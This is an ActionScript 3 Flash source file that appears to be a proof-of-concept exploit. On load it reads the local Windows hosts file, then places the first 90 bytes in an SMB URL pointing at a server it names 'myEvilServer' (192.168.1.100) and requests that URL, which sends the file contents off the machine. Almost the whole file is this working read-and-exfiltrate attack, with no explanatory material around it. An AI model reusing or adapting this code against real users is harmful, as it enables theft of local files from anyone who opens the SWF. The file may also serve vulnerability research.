package
{
	import flash.display.MovieClip;
	import flash.events.Event;
	import flash.text.TextField;
	import flash.text.TextFieldAutoSize;
	import flash.events.IOErrorEvent;
	import flash.events.SecurityErrorEvent;
	import flash.events.HTTPStatusEvent;
	import flash.events.IEventDispatcher;
	import flash.events.ProgressEvent;
	import flash.net.URLLoader;
	import flash.net.URLRequest;
	
	public class Main extends MovieClip
	{
		private var loader:URLLoader;
		private var loaderTwo:URLLoader;
		
		private var tf:TextField;
		private var charLim:int = 90;
		private var arbLocalFile:String = "file:///C:/Windows/System32/drivers/etc/hosts";
		private var myEvilServer:String = "file://///192.168.1.100/";
		private var loadedLocalFile:Boolean = false;
		
		public function Main()
		{
			super();
			
			this.loader = new URLLoader();
			this.loaderTwo = new URLLoader();
			this.setupEventListeners(this.loader);
			this.setupEventListeners(this.loaderTwo);
			var request:URLRequest = new URLRequest(this.arbLocalFile);
			
			this.tf = new TextField();
			this.tf.width = 580;
			this.tf.height = 780;
			this.tf.text = "URLLoader output: ";
			this.tf.multiline = true;
			this.tf.wordWrap = true;
			addChild(this.tf);
			
			try
			{
				trace("Attempting to read '" + this.arbLocalFile + "' ...\n");
				this.loader.load(request);
			}
			catch (error:Error)
			{
				trace("Could not load URL '" + this.arbLocalFile + "':" + error.name + " - " + error.message);
			}
		}
		
		private function trace(msg:String):void
		{
			this.tf.appendText("\n" + msg);
		}
		
		private function openHandler(event:Event):void
		{
			this.trace("openHandler: " + event);
		}
		
		private function ioErrorHandler(event:IOErrorEvent):void
		{
			this.trace("ioErrorHandler: " + event);
		}
		
		private function securityErrorHandler(event:SecurityErrorEvent):void
		{
			this.trace("securityErrorHandler: " + event);
		}
		
		private function httpStatusHandler(event:HTTPStatusEvent):void
		{
			this.trace("httpStatusHandler: " + event);
		}
		
		private function completeHandler(event:Event):void
		{
			var loader:URLLoader = URLLoader(event.target);
			
			var output:String = loader.data.toString().substring(0, this.charLim);
			this.trace("completeHandler (first " + this.charLim.toString() + " bytes): " + output);
			
			if (loadedLocalFile == false)
			{
				loadedLocalFile = true;
				
				// Remove # and newlines. These cannot be used in SMB URLs.
				var urlEncodeForwardSlashedRegExp:RegExp = new RegExp("#", "gi");
				var urlEncodeForwardSlashedRegExpTwo:RegExp = new RegExp("\r\n", "gi");
				var temp:String = output.replace(urlEncodeForwardSlashedRegExp, "").replace(urlEncodeForwardSlashedRegExpTwo, "");
				
				var targetUrl:String = this.myEvilServer + temp + "/"; // Trailing slash is required
				var request:URLRequest = new URLRequest(targetUrl);
				
				this.trace("\nNow attempting to request the URL '" + targetUrl + "' ...");
				
				try
				{
					this.loaderTwo.load(request);
				}
				catch (error:Error)
				{
					trace("Could not load URL '" + targetUrl + "':" + error.name + " - " + error.message);
				}
			}
		}
		
		private function setupEventListeners(dispatcher:IEventDispatcher):void
		{
			dispatcher.addEventListener(Event.COMPLETE, this.completeHandler);
			dispatcher.addEventListener(Event.OPEN, this.openHandler);
			dispatcher.addEventListener(ProgressEvent.PROGRESS, this.progressHandler);
			dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, this.securityErrorHandler);
			dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, this.httpStatusHandler);
			dispatcher.addEventListener(IOErrorEvent.IO_ERROR, this.ioErrorHandler);
		}
		
		private function progressHandler(event:ProgressEvent):void
		{
			this.trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
		}
	}

}
